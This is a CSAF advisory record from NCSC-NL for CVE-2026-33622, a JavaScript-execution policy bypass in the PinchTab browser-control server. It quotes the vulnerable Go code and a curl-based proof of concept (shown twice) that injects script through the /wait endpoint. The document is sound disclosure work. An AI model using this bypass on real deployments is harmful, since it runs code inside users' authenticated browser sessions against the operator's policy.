{ "document": { "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE" } }, "lang": "en", "notes": [ { "category": "legal_disclaimer", "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings." } ], "publisher": { "category": "coordinator", "contact_details": "cert@ncsc.nl", "name": "National Cyber Security Centre", "namespace": "https://www.ncsc.nl/" }, "title": "CVE-2026-33622", "tracking": { "current_release_date": "2026-03-31T16:25:33.441220Z", "generator": { "date": "2026-02-17T15:00:00Z", "engine": { "name": "V.E.L.M.A", "version": "1.7" } }, "id": "CVE-2026-33622", "initial_release_date": "2026-03-24T20:55:24.638399Z", "revision_history": [ { "date": "2026-03-24T20:55:24.638399Z", "number": "1", "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)." }, { "date": "2026-03-24T20:55:27.979639Z", "number": "2", "summary": "NCSC Score created." }, { "date": "2026-03-25T18:12:52.319054Z", "number": "3", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (1).| References created (1).| CWES updated (1)." }, { "date": "2026-03-25T18:12:54.113564Z", "number": "4", "summary": "NCSC Score updated." }, { "date": "2026-03-26T21:27:26.952578Z", "number": "5", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (1).| CWES updated (1)." }, { "date": "2026-03-26T21:38:43.067788Z", "number": "6", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (1).| CWES updated (1)." }, { "date": "2026-03-26T21:38:50.074493Z", "number": "7", "summary": "NCSC Score updated." }, { "date": "2026-03-27T00:13:47.752394Z", "number": "8", "summary": "Source created.| CVE status created. (valid)| Description created for source.| References created (1)." }, { "date": "2026-03-27T20:56:40.619081Z", "number": "9", "summary": "Source connected.| CVE status created. (valid)| EPSS created." }, { "date": "2026-03-27T20:56:43.724523Z", "number": "10", "summary": "NCSC Score updated." }, { "date": "2026-03-27T21:26:01.201323Z", "number": "11", "summary": "Unknown change." }, { "date": "2026-03-28T07:57:44.079613Z", "number": "12", "summary": "References created (1)." }, { "date": "2026-03-31T16:24:56.866348Z", "number": "13", "summary": "CVSS created.| Products connected (1).| Product Identifiers created (1).| Exploits created (1)." }, { "date": "2026-03-31T16:25:06.889773Z", "number": "14", "summary": "NCSC Score updated." } ], "status": "interim", "version": "14" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/>=0.8.3|<=0.8.5", "product": { "name": "vers:unknown/>=0.8.3|<=0.8.5", "product_id": "CSAFPID-5907195", "product_identification_helper": { "cpe": "cpe:2.3:a:pinchtab:pinchtab:*:*:*:*:*:*:*:*" } } } ], "category": "product_name", "name": "pinchtab" } ], "category": "vendor", "name": "pinchtab" } ] }, "vulnerabilities": [ { "cve": "CVE-2026-33622", "cwe": { "id": "CWE-94", "name": "Improper Control of Generation of Code ('Code Injection')" }, "notes": [ { "category": "description", "text": "### Summary\nPinchTab `v0.8.3` through `v0.8.5` allow arbitrary JavaScript execution through `POST /wait` and `POST /tabs/{id}/wait` when the request uses `fn` mode, even if `security.allowEvaluate` is disabled.\n\n`POST /evaluate` correctly enforces the `security.allowEvaluate` guard, which is disabled by default. However, in the affected releases, `POST /wait` accepted a user-controlled `fn` expression, embedded it directly into executable JavaScript, and evaluated it in the browser context without checking the same policy.\n\nThis is a security-policy bypass rather than a separate authentication bypass. Exploitation still requires authenticated API access, but a caller with the server token can execute arbitrary JavaScript in a tab context even when the operator explicitly disabled JavaScript evaluation.\n\nThe current worktree fixes this by applying the same policy boundary to `fn` mode in `/wait` that already exists on `/evaluate`, while preserving the non-code wait modes.\n\n### Details\n**Issue 1 — `/evaluate` enforced the guard, `/wait` did not (`v0.8.3` through `v0.8.5`):**\nThe dedicated evaluate endpoint rejected requests when `security.allowEvaluate` was disabled:\n\n```go\n// internal/handlers/evaluate.go — v0.8.5\nfunc (h *Handlers) evaluateEnabled() bool {\n return h != nil && h.Config != nil && h.Config.AllowEvaluate\n}\n\nfunc (h *Handlers) HandleEvaluate(w http.ResponseWriter, r *http.Request) {\n if !h.evaluateEnabled() {\n httpx.ErrorCode(w, 403, \"evaluate_disabled\", httpx.DisabledEndpointMessage(\"evaluate\", \"security.allowEvaluate\"), false, map[string]any{\n \"setting\": \"security.allowEvaluate\",\n })\n return\n }\n // ...\n}\n```\n\nIn the same releases, `/wait` did not apply that guard before evaluating `fn`:\n\n```go\n// internal/handlers/wait.go — v0.8.5 (vulnerable)\nfunc (h *Handlers) handleWaitCore(w http.ResponseWriter, r *http.Request, req waitRequest) {\n mode := req.mode()\n if mode == \"\" {\n httpx.Error(w, 400, fmt.Errorf(\"one of selector, text, url, load, fn, or ms is required\"))\n return\n }\n\n // No evaluateEnabled() check here in affected releases\n // ...\n}\n```\n\n**Issue 2 — `fn` mode evaluated caller-supplied JavaScript directly:**\nThe `fn` branch built executable JavaScript from the request field and passed it to `chromedp.Evaluate`:\n\n```go\n// internal/handlers/wait.go — v0.8.5 (vulnerable)\ncase \"fn\":\n js = fmt.Sprintf(`!!(function(){try{return %s}catch(e){return false}})()`, req.Fn)\n matchLabel = \"fn\"\n\n// Poll loop\nevalErr := chromedp.Run(tCtx, chromedp.Evaluate(js, &result))\n```\n\nBecause `req.Fn` was interpolated directly into evaluated JavaScript, a caller could supply expressions with side effects, not just passive predicates.\n\n**Issue 3 — Current worktree contains an unreleased fix:**\nThe current worktree closes this gap by making `fn` mode in `/wait` respect the same `security.allowEvaluate` policy boundary that `/evaluate` already enforced. The underlying non-code wait modes remain available.\n\n### PoC\n**Prerequisites**\n\n- PinchTab `v0.8.3`, `v0.8.4`, or `v0.8.5`\n- A configured API token\n- `security.allowEvaluate = false`\n- A reachable tab context, created by the caller or already present\n\n**Step 1 — Confirm `/evaluate` is blocked by policy**\n\n```bash\ncurl -s -X POST http://localhost:9867/evaluate \\\n -H \"Authorization: Bearer \" \\\n -H \"Content-Type: application/json\" \\\n -d '{\"expression\":\"1+1\"}'\n```\n\nExpected:\n\n```json\n{\n \"code\": \"evaluate_disabled\"\n}\n```\n\n**Step 2 — Open a tab**\n\n```bash\ncurl -s -X POST http://localhost:9867/navigate \\\n -H \"Authorization: Bearer \" \\\n -H \"Content-Type: application/json\" \\\n -d '{\"url\":\"https://example.com\"}'\n```\n\nExample result:\n\n```json\n{\n \"tabId\": \"\",\n \"title\": \"Example Domain\",\n \"url\": \"https://example.com/\"\n}\n```\n\n**Step 3 — Execute JavaScript through `/wait` using `fn` mode**\n\n```bash\ncurl -s -X POST http://localhost:9867/wait \\\n -H \"Authorization: Bearer \" \\\n -H \"Content-Type: application/json\" \\\n -d '{\n \"tabId\":\"\",\n \"fn\":\"(function(){window._poc_executed=true;return true})()\",\n \"timeout\":5000\n }'\n```\n\nExample result:\n\n```json\n{\n \"waited\": true,\n \"elapsed\": 1,\n \"match\": \"fn\"\n}\n```\n\n**Step 4 — Verify the side effect**\n\n```bash\ncurl -s -X POST http://localhost:9867/wait \\\n -H \"Authorization: Bearer \" \\\n -H \"Content-Type: application/json\" \\\n -d '{\n \"tabId\":\"\",\n \"fn\":\"window._poc_executed === true\",\n \"timeout\":3000\n }'\n```\n\nExample result:\n\n```json\n{\n \"waited\": true,\n \"elapsed\": 0,\n \"match\": \"fn\"\n}\n```\n\n**Observation**\n1. `/evaluate` returns `evaluate_disabled` when `security.allowEvaluate` is off.\n2. `/wait` still evaluates caller-supplied JavaScript through `fn` mode in the affected releases.\n3. The first `/wait` request introduces a side effect in page state.\n4. The second `/wait` request confirms that the side effect occurred, demonstrating arbitrary JavaScript execution despite the disabled evaluate policy.\n\n### Impact\n1. Bypass of the explicit `security.allowEvaluate` control in `v0.8.3` through `v0.8.5`.\n2. Arbitrary JavaScript execution in the reachable browser tab context for callers who already possess the server API token.\n3. Ability to read or modify page state and act within authenticated browser sessions available to that tab context.\n4. Inconsistent security boundaries between `/evaluate` and `/wait`, making the configured execution policy unreliable.\n5. This is not an unauthenticated issue. Practical risk depends on who can access the API and whether the deployment exposes tabs containing sensitive authenticated state.\n\n### Suggested Remediation\n1. Make `fn` mode in `/wait` enforce the same policy check as `/evaluate`.\n2. Keep non-code wait modes available when JavaScript evaluation is disabled.\n3. Add regression coverage so the policy boundary remains consistent across endpoints.", "title": "github - https://api.github.com/advisories/GHSA-w5pc-m664-r62v" }, { "category": "description", "text": "### Summary\nPinchTab `v0.8.3` through `v0.8.5` allow arbitrary JavaScript execution through `POST /wait` and `POST /tabs/{id}/wait` when the request uses `fn` mode, even if `security.allowEvaluate` is disabled.\n\n`POST /evaluate` correctly enforces the `security.allowEvaluate` guard, which is disabled by default. However, in the affected releases, `POST /wait` accepted a user-controlled `fn` expression, embedded it directly into executable JavaScript, and evaluated it in the browser context without checking the same policy.\n\nThis is a security-policy bypass rather than a separate authentication bypass. Exploitation still requires authenticated API access, but a caller with the server token can execute arbitrary JavaScript in a tab context even when the operator explicitly disabled JavaScript evaluation.\n\nThe current worktree fixes this by applying the same policy boundary to `fn` mode in `/wait` that already exists on `/evaluate`, while preserving the non-code wait modes.\n\n### Details\n**Issue 1 — `/evaluate` enforced the guard, `/wait` did not (`v0.8.3` through `v0.8.5`):**\nThe dedicated evaluate endpoint rejected requests when `security.allowEvaluate` was disabled:\n\n```go\n// internal/handlers/evaluate.go — v0.8.5\nfunc (h *Handlers) evaluateEnabled() bool {\n return h != nil && h.Config != nil && h.Config.AllowEvaluate\n}\n\nfunc (h *Handlers) HandleEvaluate(w http.ResponseWriter, r *http.Request) {\n if !h.evaluateEnabled() {\n httpx.ErrorCode(w, 403, \"evaluate_disabled\", httpx.DisabledEndpointMessage(\"evaluate\", \"security.allowEvaluate\"), false, map[string]any{\n \"setting\": \"security.allowEvaluate\",\n })\n return\n }\n // ...\n}\n```\n\nIn the same releases, `/wait` did not apply that guard before evaluating `fn`:\n\n```go\n// internal/handlers/wait.go — v0.8.5 (vulnerable)\nfunc (h *Handlers) handleWaitCore(w http.ResponseWriter, r *http.Request, req waitRequest) {\n mode := req.mode()\n if mode == \"\" {\n httpx.Error(w, 400, fmt.Errorf(\"one of selector, text, url, load, fn, or ms is required\"))\n return\n }\n\n // No evaluateEnabled() check here in affected releases\n // ...\n}\n```\n\n**Issue 2 — `fn` mode evaluated caller-supplied JavaScript directly:**\nThe `fn` branch built executable JavaScript from the request field and passed it to `chromedp.Evaluate`:\n\n```go\n// internal/handlers/wait.go — v0.8.5 (vulnerable)\ncase \"fn\":\n js = fmt.Sprintf(`!!(function(){try{return %s}catch(e){return false}})()`, req.Fn)\n matchLabel = \"fn\"\n\n// Poll loop\nevalErr := chromedp.Run(tCtx, chromedp.Evaluate(js, &result))\n```\n\nBecause `req.Fn` was interpolated directly into evaluated JavaScript, a caller could supply expressions with side effects, not just passive predicates.\n\n**Issue 3 — Current worktree contains an unreleased fix:**\nThe current worktree closes this gap by making `fn` mode in `/wait` respect the same `security.allowEvaluate` policy boundary that `/evaluate` already enforced. The underlying non-code wait modes remain available.\n\n### PoC\n**Prerequisites**\n\n- PinchTab `v0.8.3`, `v0.8.4`, or `v0.8.5`\n- A configured API token\n- `security.allowEvaluate = false`\n- A reachable tab context, created by the caller or already present\n\n**Step 1 — Confirm `/evaluate` is blocked by policy**\n\n```bash\ncurl -s -X POST http://localhost:9867/evaluate \\\n -H \"Authorization: Bearer \" \\\n -H \"Content-Type: application/json\" \\\n -d '{\"expression\":\"1+1\"}'\n```\n\nExpected:\n\n```json\n{\n \"code\": \"evaluate_disabled\"\n}\n```\n\n**Step 2 — Open a tab**\n\n```bash\ncurl -s -X POST http://localhost:9867/navigate \\\n -H \"Authorization: Bearer \" \\\n -H \"Content-Type: application/json\" \\\n -d '{\"url\":\"https://example.com\"}'\n```\n\nExample result:\n\n```json\n{\n \"tabId\": \"\",\n \"title\": \"Example Domain\",\n \"url\": \"https://example.com/\"\n}\n```\n\n**Step 3 — Execute JavaScript through `/wait` using `fn` mode**\n\n```bash\ncurl -s -X POST http://localhost:9867/wait \\\n -H \"Authorization: Bearer \" \\\n -H \"Content-Type: application/json\" \\\n -d '{\n \"tabId\":\"\",\n \"fn\":\"(function(){window._poc_executed=true;return true})()\",\n \"timeout\":5000\n }'\n```\n\nExample result:\n\n```json\n{\n \"waited\": true,\n \"elapsed\": 1,\n \"match\": \"fn\"\n}\n```\n\n**Step 4 — Verify the side effect**\n\n```bash\ncurl -s -X POST http://localhost:9867/wait \\\n -H \"Authorization: Bearer \" \\\n -H \"Content-Type: application/json\" \\\n -d '{\n \"tabId\":\"\",\n \"fn\":\"window._poc_executed === true\",\n \"timeout\":3000\n }'\n```\n\nExample result:\n\n```json\n{\n \"waited\": true,\n \"elapsed\": 0,\n \"match\": \"fn\"\n}\n```\n\n**Observation**\n1. `/evaluate` returns `evaluate_disabled` when `security.allowEvaluate` is off.\n2. `/wait` still evaluates caller-supplied JavaScript through `fn` mode in the affected releases.\n3. The first `/wait` request introduces a side effect in page state.\n4. The second `/wait` request confirms that the side effect occurred, demonstrating arbitrary JavaScript execution despite the disabled evaluate policy.\n\n### Impact\n1. Bypass of the explicit `security.allowEvaluate` control in `v0.8.3` through `v0.8.5`.\n2. Arbitrary JavaScript execution in the reachable browser tab context for callers who already possess the server API token.\n3. Ability to read or modify page state and act within authenticated browser sessions available to that tab context.\n4. Inconsistent security boundaries between `/evaluate` and `/wait`, making the configured execution policy unreliable.\n5. This is not an unauthenticated issue. Practical risk depends on who can access the API and whether the deployment exposes tabs containing sensitive authenticated state.\n\n### Suggested Remediation\n1. Make `fn` mode in `/wait` enforce the same policy check as `/evaluate`.\n2. Keep non-code wait modes available when JavaScript evaluation is disabled.\n3. Add regression coverage so the policy boundary remains consistent across endpoints.", "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGHSA-w5pc-m664-r62v.json?alt=media" }, { "category": "description", "text": "PinchTab is a standalone HTTP server that gives AI agents direct control over a Chrome browser. PinchTab `v0.8.3` through `v0.8.5` allow arbitrary JavaScript execution through `POST /wait` and `POST /tabs/{id}/wait` when the request uses `fn` mode, even if `security.allowEvaluate` is disabled. `POST /evaluate` correctly enforces the `security.allowEvaluate` guard, which is disabled by default. However, in the affected releases, `POST /wait` accepted a user-controlled `fn` expression, embedded it directly into executable JavaScript, and evaluated it in the browser context without checking the same policy. This is a security-policy bypass rather than a separate authentication bypass. Exploitation still requires authenticated API access, but a caller with the server token can execute arbitrary JavaScript in a tab context even when the operator explicitly disabled JavaScript evaluation. The current worktree fixes this by applying the same policy boundary to `fn` mode in `/wait` that already exists on `/evaluate`, while preserving the non-code wait modes. As of time of publication, a patched version is not yet available.", "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33622" }, { "category": "description", "text": "PinchTab is a standalone HTTP server that gives AI agents direct control over a Chrome browser. PinchTab `v0.8.3` through `v0.8.5` allow arbitrary JavaScript execution through `POST /wait` and `POST /tabs/{id}/wait` when the request uses `fn` mode, even if `security.allowEvaluate` is disabled. `POST /evaluate` correctly enforces the `security.allowEvaluate` guard, which is disabled by default. However, in the affected releases, `POST /wait` accepted a user-controlled `fn` expression, embedded it directly into executable JavaScript, and evaluated it in the browser context without checking the same policy. This is a security-policy bypass rather than a separate authentication bypass. Exploitation still requires authenticated API access, but a caller with the server token can execute arbitrary JavaScript in a tab context even when the operator explicitly disabled JavaScript evaluation. The current worktree fixes this by applying the same policy boundary to `fn` mode in `/wait` that already exists on `/evaluate`, while preserving the non-code wait modes. As of time of publication, a patched version is not yet available.", "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33622.json" }, { "category": "description", "text": "A PinchTab Security Policy Bypass in /wait Allows Arbitrary JavaScript Execution in github.com/pinchtab/pinchtab", "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGO-2026-4824.json?alt=media" }, { "category": "other", "text": "0.00095", "title": "EPSS" }, { "category": "other", "text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:N/SC:H/SI:N/SA:N", "title": "CVSSV4" }, { "category": "other", "text": "6.1", "title": "CVSSV4 base score" }, { "category": "other", "text": "3.5", "title": "NCSC Score" }, { "category": "other", "text": "There is exploit data available from source Nvd, The value of the most recent EPSS score, Exploit code publicly available", "title": "NCSC Score top decreasing factors" } ], "product_status": { "known_affected": [ "CSAFPID-5907195" ] }, "references": [ { "category": "external", "summary": "Source - github", "url": "https://api.github.com/advisories/GHSA-w5pc-m664-r62v" }, { "category": "external", "summary": "Source - osv", "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGHSA-w5pc-m664-r62v.json?alt=media" }, { "category": "external", "summary": "Source - nvd", "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33622" }, { "category": "external", "summary": "Source - cveprojectv5", "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33622.json" }, { "category": "external", "summary": "Source - osv", "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGO-2026-4824.json?alt=media" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv", "url": "https://github.com/pinchtab/pinchtab/security/advisories/GHSA-w5pc-m664-r62v" }, { "category": "external", "summary": "Reference - github", "url": "https://github.com/advisories/GHSA-w5pc-m664-r62v" }, { "category": "external", "summary": "Reference - github", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33622" } ], "scores": [ { "cvss_v3": { "version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH" }, "products": [ "CSAFPID-5907195" ] } ], "title": "CVE-2026-33622" } ] }